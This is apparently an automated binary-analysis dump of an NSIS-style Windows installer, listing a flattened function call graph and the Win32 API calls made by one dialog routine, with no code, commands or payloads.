4118->4122 4119->4107 4123 405650 4120->4123 4126 4055b9 4121->4126 4127 40551c GetDlgItem 4121->4127 4122->4133 4123->4112 4128 405654 SendMessageW 4123->4128 4124 
40141d 80 API calls 4124->4143 4125 4058de DestroyWindow KiUserCallbackDispatcher 4125->4172 4182 403dca 4126->4182 4131 40554c 4127->4131 4132 40552f SendMessageW IsWindowEnabled 4127->4132 4128->4133 4130 40590d ShowWindow 4130->4133 4135 405559 4131->4135 4136 4055a0 SendMessageW 4131->4136 4137 40556c 4131->4137 4146 405551 4131->4146 4132->4131 4132->4133 4134 406805 18 API calls 4134->4143 4135->4136 4135->4146 4136->4126 4140 405574 4137->4140 4141 405589 4137->4141 4139 403d3f 19 API calls 4139->4143 4144 40141d 80 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4142 405587 4142->4126 4143->4124 4143->4125 4143->4133 4143->4134 4143->4139 4163 40581e DestroyWindow 4143->4163 4173 403d3f 4143->4173 4144->4146 4147 405590 4145->4147 4179 403d18 4146->4179 4147->4126 4147->4146 4149 405705 GetDlgItem 4150 405723 ShowWindow KiUserCallbackDispatcher 4149->4150 4151 40571a 4149->4151 4176 403d85 KiUserCallbackDispatcher 4150->4176 4151->4150 4153 40574d EnableWindow 4156 405761 4153->4156 4154 405766 GetSystemMenu EnableMenuItem SendMessageW 4155 405796 SendMessageW 4154->4155 4154->4156 4155->4156 4156->4154 4177 403d98 SendMessageW 4156->4177 4178 406009 lstrcpynW 4156->4178 4159 4057c4 lstrlenW 4160 406805 18 API calls 4159->4160 4161 4057da SetWindowTextW 4160->4161 4162 40139d 80 API calls 4161->4162 4162->4143 4164 405838 CreateDialogParamW 4163->4164 4163->4172 4165 40586b 4164->4165 4164->4172 4166 403d3f 19 API calls 4165->4166 4167 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4166->4167 4168 40139d 80 API calls 4167->4168 4169 4058bc 4168->4169 4169->4133 4170 4058c4 ShowWindow 4169->4170 4171 403daf SendMessageW 4170->4171 4171->4172 4172->4130 4172->4133 4174 406805 18 API calls 4173->4174 4175 403d4a SetDlgItemTextW 4174->4175 4175->4149 4176->4153 4177->4156 4178->4159 4180 403d25 SendMessageW 4179->4180 4181 403d1f 4179->4181 4180->4142 4181->4180 4183 403ddf GetWindowLongW 4182->4183 4193 403e68 4182->4193 4184 403df0 
4183->4184 4183->4193 4185 403e02 4184->4185 4186 403dff GetSysColor 4184->4186 4187 403e12 SetBkMode 4185->4187 4188 403e08 SetTextColor 4185->4188 4186->4185 4189 403e30 4187->4189 4190 403e2a GetSysColor 4187->4190 4188->4187 4191 403e41 4189->4191 4192 403e37 SetBkColor 4189->4192 4190->4189 4191->4193 4194 403e54 DeleteObject 4191->4194 4195 403e5b CreateBrushIndirect 4191->4195 4192->4191 4193->4133 4194->4195 4195->4193 4735 4020f9 GetDC GetDeviceCaps 4736 401446 18 API calls 4735->4736 4737 402116 MulDiv 4736->4737 4738 401446 18 API calls 4737->4738 4739 40212c 4738->4739 4740 406805 18 API calls 4739->4740 4741 402165 CreateFontIndirectW 4740->4741 4742 4030dc 4741->4742 4743 4030e3 4742->4743 4745 405f51 wsprintfW 4742->4745 4745->4743 4746 4024fb 4747 40145c 18 API calls 4746->4747 4748 402502 4747->4748 4749 40145c 18 API calls 4748->4749 4750 40250c 4749->4750 4751 40145c 18 API calls 4750->4751 4752 402515 4751->4752 4753 40145c 18 API calls 4752->4753 4754 40251f 4753->4754 4755 40145c 18 API calls 4754->4755 4756 402529 4755->4756 4757 40253d 4756->4757 4758 40145c 18 API calls 4756->4758 4759 4062a3 11 API calls 4757->4759 4758->4757 4760 40256a CoCreateInstance 4759->4760 4761 40258c 4760->4761 4762 40497c GetDlgItem GetDlgItem 4763 4049d2 7 API calls 4762->4763 4768 404bea 4762->4768 4764 404a76 DeleteObject 4763->4764 4765 404a6a SendMessageW 4763->4765 4766 404a81 4764->4766 4765->4764 4769 404ab8 4766->4769 4771 406805 18 API calls 4766->4771 4767 404ccf 4770 404d74 4767->4770 4775 404bdd 4767->4775 4780 404d1e SendMessageW 4767->4780 4768->4767 4778 40484e 5 API calls 4768->4778 4791 404c5a 4768->4791 4774 403d3f 19 API calls 4769->4774 4772 404d89 4770->4772 4773 404d7d SendMessageW 4770->4773 4777 404a9a SendMessageW SendMessageW 4771->4777 4782 404da2 4772->4782 4783 404d9b ImageList_Destroy 4772->4783 4793 404db2 4772->4793 4773->4772 4779 404acc 4774->4779 4781 403dca 8 API calls 4775->4781 4776 404cc1 SendMessageW 4776->4767 4777->4766 
4778->4791 4784 403d3f 19 API calls 4779->4784 4780->4775 4786 404d33 SendMessageW 4780->4786 4787 404f6b 4781->4787 4788 404dab GlobalFree 4782->4788 4782->4793 4783->4782 4789 404add 4784->4789 4785 404f1c 4785->4775 4794 404f31 ShowWindow GetDlgItem ShowWindow 4785->4794 4790 404d46 4786->4790 4788->4793 4792 404baa GetWindowLongW SetWindowLongW 4789->4792 4801 404ba4 4789->4801 4804 404b39 SendMessageW 4789->4804 4805 404b67 SendMessageW 4789->4805 4806 404b7b SendMessageW 4789->4806 4800 404d57 SendMessageW 4790->4800 4791->4767 4791->4776 4795 404bc4 4792->4795 4793->4785 4796 404de4 4793->4796 4799 40141d 80 API calls 4793->4799 4794->4775 4797 404be2 4795->4797 4798 404bca ShowWindow 4795->4798 4809 404e12 SendMessageW 4796->4809 4812 404e28 4796->4812 4814 403d98 SendMessageW 4797->4814 4813 403d98 SendMessageW 4798->4813 4799->4796 4800->4770 4801->4792 4801->4795 4804->4789 4805->4789 4806->4789 4807 404ef3 InvalidateRect 4807->4785 4808 404f09 4807->4808 4815 4043ad 4808->4815 4809->4812 4811 404ea1 SendMessageW SendMessageW 4811->4812 4812->4807 4812->4811 4813->4775 4814->4768 4816 4043cd 4815->4816 4817 406805 18 API calls 4816->4817 4818 40440d 4817->4818 4819 406805 18 API calls 4818->4819 4820 404418 4819->4820 4821 406805 18 API calls 4820->4821 4822 404428 lstrlenW wsprintfW SetDlgItemTextW 4821->4822 4822->4785 4823 4026fc 4824 401ee4 4823->4824 4826 402708 4823->4826 4824->4823 4825 406805 18 API calls 4824->4825 4825->4824 4275 4019fd 4276 40145c 18 API calls 4275->4276 4277 401a04 4276->4277 4278 405e7f 2 API calls 4277->4278 4279 401a0b 4278->4279 4827 4022fd 4828 40145c 18 API calls 4827->4828 4829 402304 GetFileVersionInfoSizeW 4828->4829 4830 40232b GlobalAlloc 4829->4830 4834 4030e3 4829->4834 4831 40233f GetFileVersionInfoW 4830->4831 4830->4834 4832 402350 VerQueryValueW 4831->4832 4833 402381 GlobalFree 4831->4833 4832->4833 4836 402369 4832->4836 4833->4834 4840 405f51 wsprintfW 4836->4840 4838 402375 4841 405f51 wsprintfW 
4838->4841 4840->4838 4841->4833 4842 402afd 4843 40145c 18 API calls 4842->4843 4844 402b04 4843->4844 4849 405e50 GetFileAttributesW CreateFileW 4844->4849 4846 402b10 4847 4030e3 4846->4847 4850 405f51 wsprintfW 4846->4850 4849->4846 4850->4847 4851 4029ff 4852 401553 19 API calls 4851->4852 4853 402a09 4852->4853 4854 40145c 18 API calls 4853->4854 4855 402a12 4854->4855 4856 402a1f RegQueryValueExW 4855->4856 4858 401a13 4855->4858 4857 402a3f 4856->4857 4861 402a45 4856->4861 4857->4861 4862 405f51 wsprintfW 4857->4862 4860 4029e4 RegCloseKey 4860->4858 4861->4858 4861->4860 4862->4861 4863 401000 4864 401037 BeginPaint GetClientRect 4863->4864 4865 40100c DefWindowProcW 4863->4865 4867 4010fc 4864->4867 4868 401182 4865->4868 4869 401073 CreateBrushIndirect FillRect DeleteObject 4867->4869 4870 401105 4867->4870 4869->4867 4871 401170 EndPaint 4870->4871 4872 40110b CreateFontIndirectW 4870->4872 4871->4868 4872->4871 4873 40111b 6 API calls 4872->4873 4873->4871 4874 401f80 4875 401446 18 API calls 4874->4875 4876 401f88 4875->4876 4877 401446 18 API calls 4876->4877 4878 401f93 4877->4878 4879 401fa3 4878->4879 4880 40145c 18 API calls 4878->4880 4881 401fb3 4879->4881 4882 40145c 18 API calls 4879->4882 4880->4879 4883 402006 4881->4883 4884 401fbc 4881->4884 4882->4881 4886 40145c 18 API calls 4883->4886 4885 401446 18 API calls 4884->4885 4888 401fc4 4885->4888 4887 40200d 4886->4887 4889 40145c 18 API calls 4887->4889 4890 401446 18 API calls 4888->4890 4891 402016 FindWindowExW 4889->4891 4892 401fce 4890->4892 4896 402036 4891->4896 4893 401ff6 SendMessageW 4892->4893 4894 401fd8 SendMessageTimeoutW 4892->4894 4893->4896 4894->4896 4895 4030e3 4896->4895 4898 405f51 wsprintfW 4896->4898 4898->4895 4899 402880 4900 402884 4899->4900 4901 40145c 18 API calls 4900->4901 4902 4028a7 4901->4902 4903 40145c 18 API calls 4902->4903 4904 4028b1 4903->4904 4905 4028ba RegCreateKeyExW 4904->4905 4906 4028e8 4905->4906 4913 4029ef 4905->4913 4907 402934 
4906->4907 4908 40145c 18 API calls 4906->4908 4909 402963 4907->4909 4912 401446 18 API calls 4907->4912 4911 4028fc lstrlenW 4908->4911 4910 4029ae RegSetValueExW 4909->4910 4914 40337f 37 API calls 4909->4914 4917 4029c6 RegCloseKey 4910->4917 4918 4029cb 4910->4918 4915 402918 4911->4915 4916 40292a 4911->4916 4919 402947 4912->4919 4920 40297b 4914->4920 4921 4062a3 11 API calls 4915->4921 4922 4062a3 11 API calls 4916->4922 4917->4913 4923 4062a3 11 API calls 4918->4923 4924 4062a3 11 API calls 4919->4924 4930 406224 4920->4930 4926 402922 4921->4926 4922->4907 4923->4917 4924->4909 4926->4910 4929 4062a3 11 API calls 4929->4926 4931 406247 4930->4931 4932 40628a 4931->4932 4933 40625c wsprintfW 4931->4933 4934 402991 4932->4934 4935 406293 lstrcatW 4932->4935 4933->4932 4933->4933 4934->4929 4935->4934 4936 402082 4937 401446 18 API calls 4936->4937 4938 402093 SetWindowLongW 4937->4938 4939 4030e3 4938->4939 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 
3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3710 40141d 3520->3710 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3702 406c68 3529->3702 3707 405c3f CreateProcessW 3529->3707 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3713 406038 3546->3713 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3722 406722 lstrlenW CharPrevW 3549->3722 3729 405e50 GetFileAttributesW CreateFileW 3554->3729 3556 4035c7 3577 4035d7 3556->3577 3730 406009 lstrcpynW 3556->3730 3558 4035ed 3731 406751 lstrlenW 3558->3731 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3738 4032d2 3563->3738 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3772 403368 SetFilePointer 3565->3772 3749 403368 SetFilePointer 3567->3749 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3750 40337f 3571->3750 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3736 403336 ReadFile 3576->3736 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 
3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3813 405f51 wsprintfW 3585->3813 3814 405ed3 RegOpenKeyExW 3586->3814 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3796 403e95 3592->3796 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3820 403e74 3602->3820 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3819 406009 lstrcpynW 3620->3819 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3805 405047 OleInitialize 3626->3805 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3965 403c83 3640->3965 3641->3640 3647 405cb5 3646->3647 3648 
403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4022 406009 lstrcpynW 3651->4022 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4023 405e50 GetFileAttributesW CreateFileW 3674->4023 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3696 406812 3683->3696 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4026 406009 lstrcpynW 3684->4026 3685->3527 3685->3529 3687 4068d3 GetVersion 3699 4068e0 3687->3699 3688 406a46 lstrlenW 3688->3696 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3699 3693 406952 GetSystemDirectoryW 3693->3699 3694 406965 GetWindowsDirectoryW 3694->3699 3695 406038 5 API calls 3695->3696 3696->3684 3696->3687 3696->3688 3696->3689 3696->3695 4024 405f51 wsprintfW 3696->4024 4025 406009 lstrcpynW 3696->4025 3697 406805 10 API calls 3697->3699 3698 4069df lstrcatW 3698->3696 3699->3692 3699->3693 3699->3694 3699->3696 3699->3697 3699->3698 3700 406999 SHGetSpecialFolderLocation 3699->3700 3700->3699 3701 4069b1 SHGetPathFromIDListW CoTaskMemFree 3700->3701 3701->3699 3703 4062fc 3 API calls 3702->3703 3704 406c6f 3703->3704 3706 406c90 3704->3706 4027 406a99 lstrcpyW 
3704->4027 3706->3529 3708 405c7a 3707->3708 3709 405c6e CloseHandle 3707->3709 3708->3529 3709->3708 3711 40139d 80 API calls 3710->3711 3712 401432 3711->3712 3712->3495 3719 406045 3713->3719 3714 4060bb 3715 4060c1 CharPrevW 3714->3715 3717 4060e1 3714->3717 3715->3714 3716 4060ae CharNextW 3716->3714 3716->3719 3717->3549 3718 405d06 CharNextW 3718->3719 3719->3714 3719->3716 3719->3718 3720 40609a CharNextW 3719->3720 3721 4060a9 CharNextW 3719->3721 3720->3719 3721->3716 3723 4037ea CreateDirectoryW 3722->3723 3724 40673f lstrcatW 3722->3724 3725 405e7f 3723->3725 3724->3723 3726 405e8c GetTickCount GetTempFileNameW 3725->3726 3727 405ec2 3726->3727 3728 4037fe 3726->3728 3727->3726 3727->3728 3728->3475 3729->3556 3730->3558 3732 406760 3731->3732 3733 4035f3 3732->3733 3734 406766 CharPrevW 3732->3734 3735 406009 lstrcpynW 3733->3735 3734->3732 3734->3733 3735->3562 3737 403357 3736->3737 3737->3576 3739 4032f3 3738->3739 3740 4032db 3738->3740 3743 403303 GetTickCount 3739->3743 3744 4032fb 3739->3744 3741 4032e4 DestroyWindow 3740->3741 3742 4032eb 3740->3742 3741->3742 3742->3565 3746 403311 CreateDialogParamW ShowWindow 3743->3746 3747 403334 3743->3747 3773 406332 3744->3773 3746->3747 3747->3565 3749->3571 3752 403398 3750->3752 3751 4033c3 3754 403336 ReadFile 3751->3754 3752->3751 3795 403368 SetFilePointer 3752->3795 3755 4033ce 3754->3755 3756 4033e7 GetTickCount 3755->3756 3757 403518 3755->3757 3759 4033d2 3755->3759 3769 4033fa 3756->3769 3758 40351c 3757->3758 3763 403540 3757->3763 3760 403336 ReadFile 3758->3760 3759->3580 3760->3759 3761 403336 ReadFile 3761->3763 3762 403336 ReadFile 3762->3769 3763->3759 3763->3761 3764 40355f WriteFile 3763->3764 3764->3759 3765 403574 3764->3765 3765->3759 3765->3763 3767 40345c GetTickCount 3767->3769 3768 403485 MulDiv wsprintfW 3784 404f72 3768->3784 3769->3759 3769->3762 3769->3767 3769->3768 3771 4034c9 WriteFile 3769->3771 3777 407312 3769->3777 3771->3759 3771->3769 3772->3572 3774 40634f 
PeekMessageW 3773->3774 3775 406345 DispatchMessageW 3774->3775 3776 403301 3774->3776 3775->3774 3776->3565 3778 407332 3777->3778 3779 40733a 3777->3779 3778->3769 3779->3778 3780 4073c2 GlobalFree 3779->3780 3781 4073cb GlobalAlloc 3779->3781 3782 407443 GlobalAlloc 3779->3782 3783 40743a GlobalFree 3779->3783 3780->3781 3781->3778 3781->3779 3782->3778 3782->3779 3783->3782 3785 404f8b 3784->3785 3794 40502f 3784->3794 3786 404fa9 lstrlenW 3785->3786 3787 406805 18 API calls 3785->3787 3788 404fd2 3786->3788 3789 404fb7 lstrlenW 3786->3789 3787->3786 3791 404fe5 3788->3791 3792 404fd8 SetWindowTextW 3788->3792 3790 404fc9 lstrcatW 3789->3790 3789->3794 3790->3788 3793 404feb SendMessageW SendMessageW SendMessageW 3791->3793 3791->3794 3792->3791 3793->3794 3794->3769 3795->3751 3797 403ea9 3796->3797 3825 405f51 wsprintfW 3797->3825 3799 403f1d 3800 406805 18 API calls 3799->3800 3801 403f29 SetWindowTextW 3800->3801 3803 403f44 3801->3803 3802 403f5f 3802->3595 3803->3802 3804 406805 18 API calls 3803->3804 3804->3803 3826 403daf 3805->3826 3807 40506a 3810 4062a3 11 API calls 3807->3810 3812 405095 3807->3812 3829 40139d 3807->3829 3808 403daf SendMessageW 3809 4050a5 OleUninitialize 3808->3809 3809->3632 3810->3807 3812->3808 3813->3592 3815 405f07 RegQueryValueExW 3814->3815 3816 405989 3814->3816 3817 405f29 RegCloseKey 3815->3817 3816->3590 3816->3591 3817->3816 3819->3597 3964 406009 lstrcpynW 3820->3964 3822 403e88 3823 406722 3 API calls 3822->3823 3824 403e8e lstrcatW 3823->3824 3824->3615 3825->3799 3827 403dc7 3826->3827 3828 403db8 SendMessageW 3826->3828 3827->3807 3828->3827 3832 4013a4 3829->3832 3830 401410 3830->3807 3832->3830 3833 4013dd MulDiv SendMessageW 3832->3833 3834 4015a0 3832->3834 3833->3832 3835 4015fa 3834->3835 3914 40160c 3834->3914 3836 401601 3835->3836 3837 401742 3835->3837 3838 401962 3835->3838 3839 4019ca 3835->3839 3840 40176e 3835->3840 3841 401650 3835->3841 3842 4017b1 3835->3842 3843 401672 3835->3843 3844 401693 
3835->3844 3845 401616 3835->3845 3846 4016d6 3835->3846 3847 401736 3835->3847 3848 401897 3835->3848 3849 4018db 3835->3849 3850 40163c 3835->3850 3851 4016bd 3835->3851 3835->3914 3864 4062a3 11 API calls 3836->3864 3856 401751 ShowWindow 3837->3856 3857 401758 3837->3857 3861 40145c 18 API calls 3838->3861 3854 40145c 18 API calls 3839->3854 3858 40145c 18 API calls 3840->3858 3881 4062a3 11 API calls 3841->3881 3947 40145c 3842->3947 3859 40145c 18 API calls 3843->3859 3941 401446 3844->3941 3853 40145c 18 API calls 3845->3853 3870 401446 18 API calls 3846->3870 3846->3914 3847->3914 3963 405f51 wsprintfW 3847->3963 3860 40145c 18 API calls 3848->3860 3865 40145c 18 API calls 3849->3865 3855 401647 PostQuitMessage 3850->3855 3850->3914 3852 4062a3 11 API calls 3851->3852 3867 4016c7 SetForegroundWindow 3852->3867 3868 40161c 3853->3868 3869 4019d1 SearchPathW 3854->3869 3855->3914 3856->3857 3871 401765 ShowWindow 3857->3871 3857->3914 3872 401775 3858->3872 3873 401678 3859->3873 3874 40189d 3860->3874 3875 401968 GetFullPathNameW 3861->3875 3864->3914 3866 4018e2 3865->3866 3878 40145c 18 API calls 3866->3878 3867->3914 3879 4062a3 11 API calls 3868->3879 3869->3914 3870->3914 3871->3914 3882 4062a3 11 API calls 3872->3882 3883 4062a3 11 API calls 3873->3883 3959 4062d5 FindFirstFileW 3874->3959 3885 40197f 3875->3885 3927 4019a1 3875->3927 3877 40169a 3944 4062a3 lstrlenW wvsprintfW 3877->3944 3888 4018eb 3878->3888 3889 401627 3879->3889 3890 401664 3881->3890 3891 401785 SetFileAttributesW 3882->3891 3892 401683 3883->3892 3909 4062d5 2 API calls 3885->3909 3885->3927 3886 4062a3 11 API calls 3894 4017c9 3886->3894 3897 40145c 18 API calls 3888->3897 3898 404f72 25 API calls 3889->3898 3899 40139d 65 API calls 3890->3899 3900 40179a 3891->3900 3891->3914 3907 404f72 25 API calls 3892->3907 3952 405d59 CharNextW CharNextW 3894->3952 3896 4019b8 GetShortPathNameW 3896->3914 3905 4018f5 3897->3905 3898->3914 3899->3914 3906 4062a3 11 API calls 3900->3906 
3901 4018c2 3910 4062a3 11 API calls 3901->3910 3902 4018a9 3908 4062a3 11 API calls 3902->3908 3912 4062a3 11 API calls 3905->3912 3906->3914 3907->3914 3908->3914 3913 401991 3909->3913 3910->3914 3911 4017d4 3915 401864 3911->3915 3918 405d06 CharNextW 3911->3918 3936 4062a3 11 API calls 3911->3936 3916 401902 MoveFileW 3912->3916 3913->3927 3962 406009 lstrcpynW 3913->3962 3914->3832 3915->3892 3917 40186e 3915->3917 3919 401912 3916->3919 3920 40191e 3916->3920 3921 404f72 25 API calls 3917->3921 3923 4017e6 CreateDirectoryW 3918->3923 3919->3892 3925 401942 3920->3925 3930 4062d5 2 API calls 3920->3930 3926 401875 3921->3926 3923->3911 3924 4017fe GetLastError 3923->3924 3928 401827 GetFileAttributesW 3924->3928 3929 40180b GetLastError 3924->3929 3935 4062a3 11 API calls 3925->3935 3958 406009 lstrcpynW 3926->3958 3927->3896 3927->3914 3928->3911 3932 4062a3 11 API calls 3929->3932 3933 401929 3930->3933 3932->3911 3933->3925 3938 406c68 42 API calls 3933->3938 3934 401882 SetCurrentDirectoryW 3934->3914 3937 40195c 3935->3937 3936->3911 3937->3914 3939 401936 3938->3939 3940 404f72 25 API calls 3939->3940 3940->3925 3942 406805 18 API calls 3941->3942 3943 401455 3942->3943 3943->3877 3945 4060e7 9 API calls 3944->3945 3946 4016a7 Sleep 3945->3946 3946->3914 3948 406805 18 API calls 3947->3948 3949 401488 3948->3949 3950 401497 3949->3950 3951 406038 5 API calls 3949->3951 3950->3886 3951->3950 3953 405d76 3952->3953 3954 405d88 3952->3954 3953->3954 3955 405d83 CharNextW 3953->3955 3956 405dac 3954->3956 3957 405d06 CharNextW 3954->3957 3955->3956 3956->3911 3957->3954 3958->3934 3960 4018a5 3959->3960 3961 4062eb FindClose 3959->3961 3960->3901 3960->3902 3961->3960 3962->3927 3963->3914 3964->3822 3966 403c91 3965->3966 3967 403876 3966->3967 3968 403c96 FreeLibrary GlobalFree 3966->3968 3969 406c9b 3967->3969 3968->3967 3968->3968 3970 40677e 18 API calls 3969->3970 3971 406cae 3970->3971 3972 406cb7 DeleteFileW 3971->3972 3973 406cce 3971->3973 4013 

                                                    Control-flow Graph: function entry at 004050CD (graph edge listing omitted)
                                                    APIs
                                                    • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                    • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                    • GetClientRect.USER32(?,?), ref: 00405196
                                                    • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                    • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
                                                    • ShowWindow.USER32(?,00000008), ref: 0040523A
                                                    • GetDlgItem.USER32(?,000003EC), ref: 0040525B
                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040514D
                                                      • Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6
                                                      • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                      • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                      • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                    • GetDlgItem.USER32(?,000003EC), ref: 004052AB
                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
                                                    • CloseHandle.KERNELBASE(00000000), ref: 004052C0
                                                    • ShowWindow.USER32(00000000), ref: 004052E7
                                                    • ShowWindow.USER32(?,00000008), ref: 004052EC
                                                    • ShowWindow.USER32(00000008), ref: 00405333
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
                                                    • CreatePopupMenu.USER32 ref: 00405376
                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
                                                    • GetWindowRect.USER32(?,?), ref: 0040539E
                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
                                                    • OpenClipboard.USER32(00000000), ref: 0040540B
                                                    • EmptyClipboard.USER32 ref: 00405411
                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
                                                    • GlobalLock.KERNEL32(00000000), ref: 00405427
